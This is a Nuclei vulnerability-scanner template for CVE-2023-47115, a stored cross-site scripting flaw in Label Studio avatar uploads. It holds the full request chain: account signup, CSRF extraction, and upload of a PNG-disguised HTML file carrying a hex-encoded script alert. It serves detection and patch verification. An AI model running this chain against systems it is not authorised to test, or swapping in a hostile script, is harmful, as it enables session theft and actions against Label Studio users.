id: CVE-2023-47115

info:
  name: Label Studio - Stored Cross-Site Scripting
  author: isacaya
  severity: high
  description: |
    Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.
  impact: |
    Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
  remediation: |
    Update to version 1.9.2.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47115
    - https://github.com/advisories/GHSA-q68h-xwq5-mm7x
    - https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development
    - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49
    - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2023-47115
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1649949475
  tags: cve,cve2023,xss,authenticated,intrusive,label-studio

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /user/signup/?&next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false
      - |
        GET /api/current-user/whoami HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /api/users/{{id}}/avatar/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF

        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF
        Content-Disposition: form-data; name="avatar"; filename="nuclei.html"
        Content-Type: image/png

        {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF
      - |
        GET /api/current-user/whoami HTTP/1.1
        Host: {{Hostname}}
      - |
        GET {{filename}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: xpath
        name: csrftoken
        internal: true
        attribute: value
        xpath:
          - '/html/body/div/form/input'

      - type: json
        part: body
        name: id
        internal: true
        json:
          - '.id'

      - type: json
        part: body
        name: filename
        internal: true
        json:
          - '.avatar'

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(header, 'text/html')"
          - "status_code == 200"
          - 'contains(body, "<script>alert(document.domain)</script>")'
        condition: and